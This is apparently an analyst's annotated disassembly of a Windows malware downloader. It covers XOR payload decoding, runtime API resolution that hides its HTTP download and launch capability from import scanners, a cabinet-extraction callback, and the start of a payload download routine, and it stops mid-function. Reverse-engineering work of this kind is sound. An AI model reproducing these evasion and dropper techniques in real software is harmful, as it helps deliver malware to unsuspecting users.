.text:0040193C C6 45 FB 21                       mov     [ebp+var_5], 21h
.text:00401940 C6 45 FC 0B                       mov     [ebp+var_4], 0Bh
.text:00401944 C6 45 FD D6                       mov     [ebp+var_3], 0D6h
.text:00401948 C6 45 FE 0B                       mov     [ebp+var_2], 0Bh
.text:0040194C C6 45 FF 19                       mov     [ebp+var_1], 19h
.text:00401950 39 5D 0C                          cmp     [ebp+lNbBytesToDo], ebx
.text:00401953 76 26                             jbe     short loc_40197B ; nothing to do (unsigned compare with 0): straight to the epilogue
.text:00401955 56                                push    esi             ; esi is saved/used only on the non-empty path
.text:00401956
.text:00401956                   loc_401956:                             ; CODE XREF: dechiffrePayload+74j
.text:00401956 8B 45 08                          mov     eax, [ebp+lpBuffer] ; do {  (reloaded every pass: al is clobbered below)
.text:00401959 8D 34 03                          lea     esi, [ebx+eax]  ;     esi = &lpBuffer[i]
.text:00401959                                                           ;     (j, the key index, wraps to 0 after 16 bytes --
.text:00401959                                                           ;      see the cmp edi, 10h further down)
.text:0040195C 8A 0E                             mov     cl, [esi]       ;     c = lpBuffer[i]      (encoded byte)
.text:0040195E 8D 54 3D F0                       lea     edx, [ebp+edi+var_10] ;     edx = &keyTable[j]
.text:00401962 8A 02                             mov     al, [edx]       ;     k = keyTable[j]
.text:00401964 32 C8                             xor     cl, al          ;     c ^= k               (decoded byte)
.text:00401966 32 C1                             xor     al, cl          ;     k ^= c  -> k is now the original encoded byte
.text:00401968 47                                inc     edi             ;     j++
.text:00401969 88 0E                             mov     [esi], cl       ;     lpBuffer[i] = c
.text:0040196B 88 02                             mov     [edx], al       ;     keyTable[j-1] = encoded byte (used again at i+16)
.text:0040196D 83 FF 10                          cmp     edi, 10h        ;     if (j == 16)
.text:0040196D                                                           ;     (i++ and the loop test follow at loc_401974)
.text:00401970 75 02                             jnz     short loc_401974
.text:00401972 33 FF                             xor     edi, edi        ;         j = 0  -- wrap the key index
.text:00401974
.text:00401974                   loc_401974:                             ; CODE XREF: dechiffrePayload+6Cj
.text:00401974 43                                inc     ebx             ;     i++
.text:00401975 3B 5D 0C                          cmp     ebx, [ebp+lNbBytesToDo] ; } while (i < lNbBytesToDo)  (unsigned)
.text:00401978 72 DC                             jb      short loc_401956
.text:0040197A 5E                                pop     esi
.text:0040197B
.text:0040197B                   loc_40197B:                             ; CODE XREF: dechiffrePayload+4Fj
.text:0040197B 5F                                pop     edi
.text:0040197C 5B                                pop     ebx
.text:0040197D
.text:0040197D                   endProc:                                ; no XREF in this listing
.text:0040197D C9                                leave
.text:0040197E C3                                retn
.text:0040197E                   dechiffrePayload endp
.text:0040197E
.text:0040197F
.text:0040197F                   ; =============== S U B R O U T I N E =======================================
.text:0040197F
.text:0040197F                   ; Attributes: noreturn bp-based frame
.text:0040197F
.text:0040197F                   ; void __noreturn ErrorMsgBox(int lErrorCode)
.text:0040197F                   ; Formats "Error code #%d" into a 104h-byte stack buffer (wnsprintfA is
.text:0040197F                   ; bounded by that size), shows it with MessageBoxA (caption "Error",
.text:0040197F                   ; uType 10h = MB_ICONHAND, hWnd 0) and then calls ExitProcess(0).
.text:0040197F                   ; In:   arg_0 = lErrorCode; the callers visible in start push 3EAh..3EEh.
.text:0040197F                   ; Out:  never returns.  The exit code is always 0, not lErrorCode, so the
.text:0040197F                   ;       dialog text is the only place the code is surfaced.
.text:0040197F
.text:0040197F                   ErrorMsgBox     proc near               ; CODE XREF: start:EndProcessWithErrorp
.text:0040197F                                                           ; LoadUsefullLibraries:loc_401A0Ap ...
.text:0040197F
.text:0040197F                   Text            = byte ptr -104h
.text:0040197F                   lErrorCode      = dword ptr  8
.text:0040197F
.text:0040197F 55                                push    ebp
.text:00401980 8B EC                             mov     ebp, esp
.text:00401982 81 EC 04 01 00 00                 sub     esp, 104h       ; char Text[104h]
.text:00401988 FF 75 08                          push    [ebp+lErrorCode] ; %d argument
.text:0040198B 8D 85 FC FE FF FF                 lea     eax, [ebp+Text]
.text:00401991 68 F8 12 40 00                    push    offset aErrorCodeD ; "Error code #%d"
.text:00401996 68 04 01 00 00                    push    104h            ; cchDest
.text:0040199B 50                                push    eax             ; pszDest
.text:0040199C FF 15 E8 1E 40 00                 call    lpfWnsprintfA
.text:004019A2 83 C4 10                          add     esp, 10h        ; pop the 4 cdecl args
.text:004019A5 6A 10                             push    10h             ; uType
.text:004019A7 68 08 13 40 00                    push    offset Caption  ; "Error"
.text:004019AC 8D 85 FC FE FF FF                 lea     eax, [ebp+Text]
.text:004019B2 50                                push    eax             ; lpText
.text:004019B3 6A 00                             push    0               ; hWnd
.text:004019B5 FF 15 54 10 40 00                 call    MessageBoxA     ; modal: returns only once the dialog is dismissed
.text:004019BB 6A 00                             push    0               ; uExitCode
.text:004019BD FF 15 00 10 40 00                 call    ExitProcess     ; does not return; no epilogue follows
.text:004019BD                   ErrorMsgBox     endp
.text:004019BD
.text:004019BD                   ; ---------------------------------------------------------------------------
.text:004019C3 CC                                align 4
.text:004019C4
.text:004019C4                   ; =============== S U B R O U T I N E =======================================
.text:004019C4
.text:004019C4
.text:004019C4                   ; LoadUsefullLibraries() -- runtime import resolution.
.text:004019C4                   ; Loads SHLWAPI, SETUPAPI, SHELL32, WINHTTP and ADVAPI32 via LoadLibraryA and
.text:004019C4                   ; resolves 14 exports by name via GetProcAddress into the global lpf*/WinHttp*
.text:004019C4                   ; function-pointer slots used by the rest of the sample.  Only
.text:004019C4                   ; LoadLibraryA/GetProcAddress show up in the import table, so the HTTP
.text:004019C4                   ; download (WinHttp*), cabinet extraction (SetupIterateCabinetW) and launch
.text:004019C4                   ; (ShellExecuteW) capability is hidden from static import analysis; the
.text:004019C4                   ; plaintext DLL and export-name strings referenced below are the indicator.
.text:004019C4                   ; SystemFunction036 is the ADVAPI32 export name of RtlGenRandom.
.text:004019C4                   ; Error handling: a NULL handle for SHLWAPI/SETUPAPI/SHELL32/WINHTTP exits the
.text:004019C4                   ; process through ErrorMsgBox with 0BB9h/0BBAh/0BBBh/0BBCh respectively.  The
.text:004019C4                   ; ADVAPI32 handle (var_4) and every GetProcAddress result are NOT checked, so a
.text:004019C4                   ; missing export leaves a NULL slot that is only detected when it is called.
.text:004019C4                   ; In:    none
.text:004019C4                   ; Out:   global function-pointer slots written; eax = last GetProcAddress result
.text:004019C4                   ; Clobb: eax, ecx, edx, flags (via the Win32 calls); ebx, ebp, esi, edi preserved
.text:004019C4                   ; Stack: 8 bytes of locals (hModule, var_4) reserved with two push ecx
.text:004019C4
.text:004019C4                   LoadUsefullLibraries proc near          ; CODE XREF: start+5Ap
.text:004019C4
.text:004019C4                   hModule         = dword ptr -8
.text:004019C4                   var_4           = dword ptr -4
.text:004019C4
.text:004019C4 51                                push    ecx             ; reserve local hModule (SHELL32 handle); ecx value is irrelevant
.text:004019C5 51                                push    ecx             ; reserve local var_4 (ADVAPI32 handle)
.text:004019C6 53                                push    ebx             ; save callee-saved registers
.text:004019C7 55                                push    ebp
.text:004019C8 56                                push    esi
.text:004019C9 8B 35 38 10 40 00                 mov     esi, LoadLibraryA ; esi = kernel32!LoadLibraryA (static import)
.text:004019CF 57                                push    edi
.text:004019D0 68 10 13 40 00                    push    offset LibFileName ; "SHLWAPI.DLL"
.text:004019D5 FF D6                             call    esi ; LoadLibraryA
.text:004019D7 68 1C 13 40 00                    push    offset aSetupapi_dll ; "SETUPAPI.DLL"
.text:004019DC 8B D8                             mov     ebx, eax        ; ebx = hSHLWAPI
.text:004019DE FF D6                             call    esi ; LoadLibraryA
.text:004019E0 68 2C 13 40 00                    push    offset aShell32_dll ; "SHELL32.DLL"
.text:004019E5 8B E8                             mov     ebp, eax        ; ebp = hSETUPAPI (ebp is not a frame pointer here)
.text:004019E7 FF D6                             call    esi ; LoadLibraryA
.text:004019E9 68 38 13 40 00                    push    offset aWinhttp_dll ; "WINHTTP.DLL"
.text:004019EE 89 44 24 14                       mov     [esp+1Ch+hModule], eax ; hModule = hSHELL32 (eax is still the previous result)
.text:004019F2 FF D6                             call    esi ; LoadLibraryA
.text:004019F4 68 44 13 40 00                    push    offset aAdvapi32_dll ; "ADVAPI32.DLL"
.text:004019F9 8B F8                             mov     edi, eax        ; edi = hWINHTTP
.text:004019FB FF D6                             call    esi ; LoadLibraryA
.text:004019FD 89 44 24 14                       mov     [esp+18h+var_4], eax ; var_4 = hADVAPI32 (never checked for NULL)
.text:00401A01 85 DB                             test    ebx, ebx        ; SHLWAPI loaded?
.text:00401A03 75 0A                             jnz     short loc_401A0F
.text:00401A05 68 B9 0B 00 00                    push    0BB9h           ; error 3001: SHLWAPI.DLL missing
.text:00401A0A
.text:00401A0A                   loc_401A0A:                             ; CODE XREF: LoadUsefullLibraries+54j
.text:00401A0A                                                           ; LoadUsefullLibraries+62j ...
.text:00401A0A E8 70 FF FF FF                    call    ErrorMsgBox     ; shared exit trampoline: code already pushed; does not return
.text:00401A0F                   ; ---------------------------------------------------------------------------
.text:00401A0F
.text:00401A0F                   loc_401A0F:                             ; CODE XREF: LoadUsefullLibraries+3Fj
.text:00401A0F 85 ED                             test    ebp, ebp        ; SETUPAPI loaded?
.text:00401A11 75 07                             jnz     short loc_401A1A
.text:00401A13 68 BA 0B 00 00                    push    0BBAh           ; error 3002: SETUPAPI.DLL missing
.text:00401A18 EB F0                             jmp     short loc_401A0A
.text:00401A1A                   ; ---------------------------------------------------------------------------
.text:00401A1A
.text:00401A1A                   loc_401A1A:                             ; CODE XREF: LoadUsefullLibraries+4Dj
.text:00401A1A 83 7C 24 10 00                    cmp     [esp+18h+hModule], 0 ; SHELL32 loaded?
.text:00401A1F 75 07                             jnz     short loc_401A28
.text:00401A21 68 BB 0B 00 00                    push    0BBBh           ; error 3003: SHELL32.DLL missing
.text:00401A26 EB E2                             jmp     short loc_401A0A
.text:00401A28                   ; ---------------------------------------------------------------------------
.text:00401A28
.text:00401A28                   loc_401A28:                             ; CODE XREF: LoadUsefullLibraries+5Bj
.text:00401A28 85 FF                             test    edi, edi        ; WINHTTP loaded?
.text:00401A2A 75 07                             jnz     short loc_401A33
.text:00401A2C 68 BC 0B 00 00                    push    0BBCh           ; error 3004: WINHTTP.DLL missing
.text:00401A31 EB D7                             jmp     short loc_401A0A
.text:00401A33                   ; ---------------------------------------------------------------------------
.text:00401A33
.text:00401A33                   loc_401A33:                             ; CODE XREF: LoadUsefullLibraries+66j
.text:00401A33 8B 35 30 10 40 00                 mov     esi, GetProcAddress ; esi = kernel32!GetProcAddress; each result is stored
.text:00401A33                                                           ; one call later, after the next call's args are pushed
.text:00401A39 68 54 13 40 00                    push    offset ProcName ; "wnsprintfA"
.text:00401A3E 53                                push    ebx             ; hModule = SHLWAPI
.text:00401A3F FF D6                             call    esi ; GetProcAddress
.text:00401A41 68 60 13 40 00                    push    offset aWnsprintfw ; "wnsprintfW"
.text:00401A46 53                                push    ebx             ; hModule = SHLWAPI
.text:00401A47 A3 E8 1E 40 00                    mov     lpfWnsprintfA, eax ; used by ErrorMsgBox
.text:00401A4C FF D6                             call    esi ; GetProcAddress
.text:00401A4E 68 6C 13 40 00                    push    offset aSetupiterateca ; "SetupIterateCabinetW"
.text:00401A53 55                                push    ebp             ; hModule = SETUPAPI
.text:00401A54 A3 FC 1E 40 00                    mov     lpfwnsprintfW, eax ; used by CallBackFileCAB and downloadPayload
.text:00401A59 FF D6                             call    esi ; GetProcAddress
.text:00401A5B 68 84 13 40 00                    push    offset aShellexecutew ; "ShellExecuteW"
.text:00401A60 FF 74 24 14                       push    [esp+1Ch+hModule] ; hModule = SHELL32
.text:00401A64 A3 F0 1E 40 00                    mov     lpfSetupIterateCabinetW, eax ; cabinet walk; CallBackFileCAB is its callback
.text:00401A69 FF D6                             call    esi ; GetProcAddress
.text:00401A6B 68 94 13 40 00                    push    offset aStrstriw ; "StrStrIW"
.text:00401A70 53                                push    ebx             ; hModule = SHLWAPI
.text:00401A71 A3 DC 1E 40 00                    mov     lpfShellExecuteW, eax ; launch capability (its caller is not in this chunk)
.text:00401A76 FF D6                             call    esi ; GetProcAddress
.text:00401A78 68 A0 13 40 00                    push    offset aSystemfunction ; "SystemFunction036"
.text:00401A7D FF 74 24 18                       push    [esp+1Ch+var_4] ; hModule = ADVAPI32 (may be NULL: never checked)
.text:00401A81 A3 F4 1E 40 00                    mov     lpfStrStriW, eax ; used by downloadPayload to find the '/' in its lpString
.text:00401A86 FF D6                             call    esi ; GetProcAddress
.text:00401A88 68 B4 13 40 00                    push    offset aWinhttpqueryda ; "WinHttpQueryDataAvailable"
.text:00401A8D 57                                push    edi             ; hModule = WINHTTP
.text:00401A8E A3 04 1F 40 00                    mov     lpfSystemFunction036, eax ; RtlGenRandom; its consumer is not in this chunk
.text:00401A93 FF D6                             call    esi ; GetProcAddress
.text:00401A95 68 D0 13 40 00                    push    offset aWinhttpreceive ; "WinHttpReceiveResponse"
.text:00401A9A 57                                push    edi             ; hModule = WINHTTP
.text:00401A9B A3 14 1F 40 00                    mov     lpfWinHttpQueryDataAvailable, eax
.text:00401AA0 FF D6                             call    esi ; GetProcAddress
.text:00401AA2 68 E8 13 40 00                    push    offset aWinhttpsendreq ; "WinHttpSendRequest"
.text:00401AA7 57                                push    edi             ; hModule = WINHTTP
.text:00401AA8 A3 08 1F 40 00                    mov     WinHttpReceiveResponse, eax ; slot named like the API by IDA; still a pointer variable
.text:00401AAD FF D6                             call    esi ; GetProcAddress
.text:00401AAF 68 FC 13 40 00                    push    offset aWinhttpsetopti ; "WinHttpSetOption"
.text:00401AB4 57                                push    edi             ; hModule = WINHTTP
.text:00401AB5 A3 E4 1E 40 00                    mov     WinHttpSendRequest, eax ; same: a data slot, not the import
.text:00401ABA FF D6                             call    esi ; GetProcAddress
.text:00401ABC 68 10 14 40 00                    push    offset aWinhttpopenreq ; "WinHttpOpenRequest"
.text:00401AC1 57                                push    edi             ; hModule = WINHTTP
.text:00401AC2 A3 18 1F 40 00                    mov     lpfWinHttpSetOption, eax
.text:00401AC7 FF D6                             call    esi ; GetProcAddress
.text:00401AC9 68 24 14 40 00                    push    offset aWinhttpconnect ; "WinHttpConnect"
.text:00401ACE 57                                push    edi             ; hModule = WINHTTP
.text:00401ACF A3 00 1F 40 00                    mov     lpfWinHttpOpenRequest, eax
.text:00401AD4 FF D6                             call    esi ; GetProcAddress
.text:00401AD6 68 34 14 40 00                    push    offset aWinhttpopen ; "WinHttpOpen"
.text:00401ADB 57                                push    edi             ; hModule = WINHTTP
.text:00401ADC A3 0C 1F 40 00                    mov     lpfWinHttpConnect, eax
.text:00401AE1 FF D6                             call    esi ; GetProcAddress
.text:00401AE3 68 40 14 40 00                    push    offset aWinhttpreaddat ; "WinHttpReadData"
.text:00401AE8 57                                push    edi             ; hModule = WINHTTP
.text:00401AE9 A3 E0 1E 40 00                    mov     lpfWinHttpOpen, eax
.text:00401AEE FF D6                             call    esi ; GetProcAddress
.text:00401AF0 5F                                pop     edi             ; restore callee-saved registers (eax survives the pops)
.text:00401AF1 5E                                pop     esi
.text:00401AF2 5D                                pop     ebp
.text:00401AF3 A3 10 1F 40 00                    mov     lpfWinHttpReadData, eax ; last result stored mid-epilogue
.text:00401AF8 5B                                pop     ebx
.text:00401AF9 59                                pop     ecx             ; release the two dword locals
.text:00401AFA 59                                pop     ecx
.text:00401AFB C3                                retn
.text:00401AFB                   LoadUsefullLibraries endp
.text:00401AFB
.text:00401AFC
.text:00401AFC                   ; =============== S U B R O U T I N E =======================================
.text:00401AFC
.text:00401AFC                   ; The SetupIterateCabinet callback has the following prototype:
.text:00401AFC                   ; UINT PSP_FILE_CALLBACK_W ( PVOID Context, UINT Notification, UINT_PTR Param1, UINT_PTR Param2 );
.text:00401AFC                   ; where:
.text:00401AFC                   ; Context = The context information about the queue notification that is returned to the callback function.
.text:00401AFC                   ; Notification = The event that triggers the call to the callback function.
.text:00401AFC                   ; Param1 = Additional notification information. The value depends on the notification being returned.
.text:00401AFC                   ; Param2 = Additional notification information. The value depends on the notification being returned.
.text:00401AFC                   ;
.text:00401AFC                   ; CallBackFileCAB -- the callback handed to SetupIterateCabinetW (referenced
.text:00401AFC                   ; from start+200).  Only SPFILENOTIFY_FILEINCABINET (0x11) does any work: for
.text:00401AFC                   ; each cabinet member it builds the extraction target
.text:00401AFC                   ;     lpMemBlock3 = "%s%s.%s" of (lpMemBlock2, lpMemBlock1, last 3 chars of the member name)
.text:00401AFC                   ; copies it into FILE_IN_CABINET_INFO_W.FullTargetName (Param1 + 0x12) and
.text:00401AFC                   ; returns FILEOP_DOIT (1), so SetupAPI writes the member to that path.
.text:00001AFC                   ; lpMemBlock1 is the running executable's own base name (filled by
.text:00401AFC                   ; sub_401BB7); what lpMemBlock2 holds is not visible in this chunk --
.text:00401AFC                   ; presumably a directory prefix, confirm at start.  Net effect: every
.text:00401AFC                   ; extracted file is named after the downloader itself, keeping only the
.text:00401AFC                   ; member's 3-character extension.  All other notifications return 0.
.text:00401AFC                   ; A member name shorter than 4 characters aborts via ErrorMsgBox(96Ch).
.text:00401AFC                   ; In:    [ebp+8]=Context (unused), [ebp+0Ch]=Notification, [ebp+10h]=Param1,
.text:00401AFC                   ;        [ebp+14h]=Param2 (unused); stdcall, retn 10h
.text:00401AFC                   ; Out:   eax = 1 (FILEOP_DOIT) for FILEINCABINET, 0 for everything else
.text:00401AFC                   ; Stack: 0x400-byte frame of which only the 8 bytes at var_400 are visibly used
.text:00401AFC                   ; Attributes: bp-based frame
.text:00401AFC
.text:00401AFC                   CallBackFileCAB proc near               ; DATA XREF: start+200o
.text:00401AFC
.text:00401AFC                   var_400         = word ptr -400h
.text:00401AFC                   var_3FE         = word ptr -3FEh
.text:00401AFC                   var_3FC         = word ptr -3FCh
.text:00401AFC                   var_3FA         = word ptr -3FAh
.text:00401AFC                   arg_4           = dword ptr  0Ch
.text:00401AFC                   arg_8           = dword ptr  10h
.text:00401AFC
.text:00401AFC 55                                push    ebp
.text:00401AFD 8B EC                             mov     ebp, esp
.text:00401AFF 8B 4D 0C                          mov     ecx, [ebp+arg_4] ; ecx = Notification
.text:00401B02 81 EC 00 04 00 00                 sub     esp, 400h
.text:00401B08 33 C0                             xor     eax, eax        ; default return value 0
.text:00401B0A 83 E9 11                          sub     ecx, 11h        ; ecx == 0 <=> Notification == 0x11 = SPFILENOTIFY_FILEINCABINET
.text:00401B0D 74 11                             jz      short loc_401B20
.text:00401B0F 49                                dec     ecx             ; ecx == 0 <=> Notification == 0x12 = SPFILENOTIFY_NEEDNEWCABINET
.text:00401B10 74 07                             jz      short loc_401B19
.text:00401B12 49                                dec     ecx             ; ecx == 0 <=> Notification == 0x13 = SPFILENOTIFY_FILEEXTRACTED
.text:00401B13 0F 85 9A 00 00 00                 jnz     locret_401BB3   ; anything else: return 0 (eax already zero)
.text:00401B19
.text:00401B19                   loc_401B19:                             ; CODE XREF: CallBackFileCAB+14j
.text:00401B19 33 C0                             xor     eax, eax        ; NEEDNEWCABINET / FILEEXTRACTED: also return 0 (NO_ERROR)
.text:00401B1B E9 93 00 00 00                    jmp     locret_401BB3
.text:00401B20                   ; ---------------------------------------------------------------------------
.text:00401B20
.text:00401B20                   loc_401B20:                             ; CODE XREF: CallBackFileCAB+11j
.text:00401B20 56                                push    esi             ; FILEINCABINET: a member was found in the .CAB
.text:00401B21 57                                push    edi
.text:00401B22 8B 7D 10                          mov     edi, [ebp+arg_8] ; edi = Param1 = FILE_IN_CABINET_INFO_W*
.text:00401B25 FF 37                             push    dword ptr [edi] ; lpString = ->NameInCabinet
.text:00401B27 FF 15 24 10 40 00                 call    lstrlenW
.text:00401B2D 83 F8 04                          cmp     eax, 4          ; need at least 4 chars to take the "last 3" below
.text:00401B30 7D 0A                             jge     short loc_401B3C
.text:00401B32 68 6C 09 00 00                    push    96Ch            ; error 2412: member name too short
.text:00401B37 E8 43 FE FF FF                    call    ErrorMsgBox     ; does not return
.text:00401B3C                   ; ---------------------------------------------------------------------------
.text:00401B3C
.text:00401B3C                   loc_401B3C:                             ; CODE XREF: CallBackFileCAB+34j
.text:00401B3C 8B 0F                             mov     ecx, [edi]      ; ecx = NameInCabinet, eax = its length
.text:00401B3E 66 8B 54 41 FA                    mov     dx, [ecx+eax*2-6] ; copy the last 3 wide chars (the extension, assuming ".xxx")
.text:00401B43 66 89 95 00 FC FF+                mov     [ebp+var_400], dx ; into var_400[0..2] ...
.text:00401B4A 66 8B 54 41 FC                    mov     dx, [ecx+eax*2-4]
.text:00401B4F 66 89 95 02 FC FF+                mov     [ebp+var_3FE], dx
.text:00401B56 66 8B 44 41 FE                    mov     ax, [ecx+eax*2-2]
.text:00401B5B 66 89 85 04 FC FF+                mov     [ebp+var_3FC], ax
.text:00401B62 33 C0                             xor     eax, eax
.text:00401B64 66 89 85 06 FC FF+                mov     [ebp+var_3FA], ax ; ... and NUL-terminate: var_400 = L"xxx"
.text:00401B6B 8D 85 00 FC FF FF                 lea     eax, [ebp+var_400]
.text:00401B71 50                                push    eax             ; arg 6: extension
.text:00401B72 FF 35 F8 1E 40 00                 push    lpMemBlock1     ; arg 5: executable base name (from sub_401BB7)
.text:00401B78 BE 00 02 00 00                    mov     esi, 200h       ; cchDest for both wnsprintfW calls
.text:00401B7D FF 35 D8 1E 40 00                 push    lpMemBlock2     ; arg 4: prefix (contents not visible here)
.text:00401B83 68 50 14 40 00                    push    offset aSS_S    ; "%s%s.%s"
.text:00401B88 56                                push    esi
.text:00401B89 FF 35 EC 1E 40 00                 push    lpMemBlock3     ; dest: assumed to hold at least 0x200 wide chars -- confirm at its allocation
.text:00401B8F FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; lpMemBlock3 = lpMemBlock2 + lpMemBlock1 + "." + ext
.text:00401B95 FF 35 EC 1E 40 00                 push    lpMemBlock3     ; source
.text:00401B9B 83 C7 12                          add     edi, 12h        ; edi = &FILE_IN_CABINET_INFO_W.FullTargetName (offset 0x12)
.text:00401B9E 68 60 14 40 00                    push    offset aS       ; "%s"
.text:00401BA3 56                                push    esi
.text:00401BA4 57                                push    edi
.text:00401BA5 FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; FullTargetName = lpMemBlock3 (tells SetupAPI where to extract)
.text:00401BAB 83 C4 28                          add     esp, 28h        ; cdecl: pop the 6 + 4 arguments of the two calls
.text:00401BAE 33 C0                             xor     eax, eax
.text:00401BB0 5F                                pop     edi
.text:00401BB1 40                                inc     eax             ; return FILEOP_DOIT (1): extract this member
.text:00401BB2 5E                                pop     esi
.text:00401BB3
.text:00401BB3                   locret_401BB3:                          ; CODE XREF: CallBackFileCAB+17j
.text:00401BB3                                                           ; CallBackFileCAB+1Fj
.text:00401BB3 C9                                leave
.text:00401BB4 C2 10 00                          retn    10h             ; stdcall: pop the 4 callback arguments
.text:00401BB4                   CallBackFileCAB endp
.text:00401BB4
.text:00401BB7
.text:00401BB7                   ; =============== S U B R O U T I N E =======================================
.text:00401BB7
.text:00401BB7                   ; sub_401BB7 -- copy the running executable's base name (no directory, no
.text:00401BB7                   ; extension) into the global wide-string buffer lpMemBlock1, NUL-terminated.
.text:00401BB7                   ; Register-based convention (compiler-specific, not a standard ABI):
.text:00401BB7                   ; In:    EAX = pointer to the full wide-char path of the running executable
.text:00401BB7                   ;        ECX = apparently its length in wide chars: it is the start index of
.text:00401BB7                   ;              the backward scan -- confirm at the caller (start+1EC)
.text:00401BB7                   ; Out:   EAX = 1 if at least one character was copied, 0 otherwise;
.text:00401BB7                   ;        lpMemBlock1 written only on success
.text:00401BB7                   ; Clobb: ecx, edx, flags; ebx, esi, edi preserved
.text:00401BB7                   ; Assumes a 3-character extension: the last 4 characters of the name part
.text:00401BB7                   ; are dropped unconditionally.  The copy is bounded only by the name length;
.text:00401BB7                   ; there is no check against the size of lpMemBlock1 (its allocation is not
.text:00401BB7                   ; visible here).  Index 0 is never compared against '\', so a path of the
.text:00401BB7                   ; form "\name.ext" alone would keep the leading backslash.
.text:00401BB7
.text:00401BB7                   sub_401BB7      proc near               ; CODE XREF: start+1ECp
.text:00401BB7 53                                push    ebx
.text:00401BB8 56                                push    esi
.text:00401BB9 8B 35 F8 1E 40 00                 mov     esi, lpMemBlock1 ; esi = destination buffer
.text:00401BBF 8B D8                             mov     ebx, eax        ; ebx = full path
.text:00401BC1 33 C0                             xor     eax, eax        ; default return value 0
.text:00401BC3 57                                push    edi
.text:00401BC4 8B D1                             mov     edx, ecx        ; edx = scan index, starting at the end
.text:00401BC6 85 C9                             test    ecx, ecx        ; length <= 0: nothing to isolate
.text:00401BC8 7E 0F                             jle     short loc_401BD9
.text:00401BCA
.text:00401BCA                   loc_401BCA:                             ; CODE XREF: sub_401BB7+1Dj
.text:00401BCA 66 83 3C 53 5C                    cmp     word ptr [ebx+edx*2], 5Ch ; scan backward from the end for the last '\' to isolate the file name
.text:00401BCF 74 07                             jz      short loc_401BD8
.text:00401BD1 4A                                dec     edx
.text:00401BD2 85 D2                             test    edx, edx
.text:00401BD4 7F F4                             jg      short loc_401BCA ; stops before index 0 is examined
.text:00401BD6 EB 01                             jmp     short loc_401BD9 ; no '\' found: edx = 0, the whole string is the name
.text:00401BD8                   ; ---------------------------------------------------------------------------
.text:00401BD8
.text:00401BD8                   loc_401BD8:                             ; CODE XREF: sub_401BB7+18j
.text:00401BD8 42                                inc     edx             ; edx = index of the first char after the '\'
.text:00401BD9
.text:00401BD9                   loc_401BD9:                             ; CODE XREF: sub_401BB7+11j
.text:00401BD9                                                           ; sub_401BB7+1Fj
.text:00401BD9 2B CA                             sub     ecx, edx        ; ecx = length of the name part (with extension)
.text:00401BDB 8D 79 FC                          lea     edi, [ecx-4]    ; drop ".xxx": edi = length of the name without its extension
.text:00401BDE 83 FF 01                          cmp     edi, 1          ; nothing left to copy -> fail with eax = 0
.text:00401BE1 7D 04                             jge     short loc_401BE7
.text:00401BE3 33 C0                             xor     eax, eax
.text:00401BE5 EB 22                             jmp     short loc_401C09
.text:00401BE7                   ; ---------------------------------------------------------------------------
.text:00401BE7
.text:00401BE7                   loc_401BE7:                             ; CODE XREF: sub_401BB7+2Aj
.text:00401BE7 33 C9                             xor     ecx, ecx        ; ecx = number of chars copied so far
.text:00401BE9 85 FF                             test    edi, edi        ; cannot be <= 0 here (edi >= 1 above); eax is still 0
.text:00401BEB 7E 1C                             jle     short loc_401C09
.text:00401BED 8D 14 53                          lea     edx, [ebx+edx*2] ; edx = pointer to the name part (with extension)
.text:00401BF0
.text:00401BF0                   loc_401BF0:                             ; CODE XREF: sub_401BB7+45j
.text:00401BF0 66 8B 1A                          mov     bx, [edx]       ; copy edi wide chars into lpMemBlock1 (bx is free: ebx is no longer used as a base)
.text:00401BF3 66 89 1C 4E                       mov     [esi+ecx*2], bx
.text:00401BF7 41                                inc     ecx
.text:00401BF8 42                                inc     edx             ; advance one wide char
.text:00401BF9 42                                inc     edx
.text:00401BFA 3B CF                             cmp     ecx, edi
.text:00401BFC 7C F2                             jl      short loc_401BF0
.text:00401BFE 85 C9                             test    ecx, ecx        ; always > 0 after the loop
.text:00401C00 7E 07                             jle     short loc_401C09
.text:00401C02 33 C0                             xor     eax, eax
.text:00401C04 66 89 04 4E                       mov     [esi+ecx*2], ax ; NUL-terminate the copied name
.text:00401C08 40                                inc     eax             ; success: eax = 1
.text:00401C09
.text:00401C09                   loc_401C09:                             ; CODE XREF: sub_401BB7+2Ej
.text:00401C09                                                           ; sub_401BB7+34j ...
.text:00401C09 5F                                pop     edi
.text:00401C0A 5E                                pop     esi
.text:00401C0B 5B                                pop     ebx
.text:00401C0C C3                                retn
.text:00401C0C                   sub_401BB7      endp
.text:00401C0C
.text:00401C0D
.text:00401C0D                   ; =============== S U B R O U T I N E =======================================
.text:00401C0D
.text:00401C0D                   ; Variables locales :
.text:00401C0D                   ; hRequest = handle de la requête HTTP
.text:00401C0D                   ; lpAddress = adresse du buffer de lecture des données renvoyées par le GET
.text:00401C0D                   ; Attributes: bp-based frame
.text:00401C0D
.text:00401C0D                   ; int __cdecl downloadPayload(LPCWSTR lpString, int)
.text:00401C0D                   downloadPayload proc near               ; CODE XREF: start+280p
.text:00401C0D
.text:00401C0D                   String          = word ptr -42Ch
.text:00401C0D                   var_224         = word ptr -224h
.text:00401C0D                   var_1C          = dword ptr -1Ch
.text:00401C0D                   var_18          = dword ptr -18h
.text:00401C0D                   lNumberOfBytesRead= dword ptr -14h
.text:00401C0D                   var_10          = dword ptr -10h
.text:00401C0D                   hRequest        = dword ptr -0Ch
.text:00401C0D                   lNumberOfBytesAvailable= dword ptr -8
.text:00401C0D                   lpAddress       = dword ptr -4
.text:00401C0D                   lpString        = dword ptr  8
.text:00401C0D                   arg_4           = dword ptr  0Ch
.text:00401C0D
.text:00401C0D 55                                push    ebp
.text:00401C0E 8B EC                             mov     ebp, esp
.text:00401C10 81 EC 2C 04 00 00                 sub     esp, 42Ch
.text:00401C16 53                                push    ebx
.text:00401C17 56                                push    esi
.text:00401C18 57                                push    edi
.text:00401C19 68 68 14 40 00                    push    offset asc_401468 ; "/"
.text:00401C1E FF 75 08                          push    [ebp+lpString]
.text:00401C21 FF 15 F4 1E 40 00                 call    lpfStrStriW
.text:00401C27 50                                push    eax
.text:00401C28 BF 60 14 40 00                    mov     edi, offset aS  ; "%s"
.text:00401C2D 57                                push    edi
.text:00401C2E BE 04 01 00 00                    mov     esi, 104h
.text:00401C33 8D 85 D4 FB FF FF                 lea     eax, [ebp+String]
.text:00401C39 56                                push    esi
.text:00401C3A 50                                push    eax
.text:00401C3B FF 15 FC 1E 40 00                 call    lpfwnsprintfW
.text:00401C41 FF 75 08                          push    [ebp+lpString]
.text:00401C44 8D 85 DC FD FF FF                 lea     eax, [ebp+var_224]
.text:00401C4A 57                                push    edi
.text:00401C4B 56                                push    esi
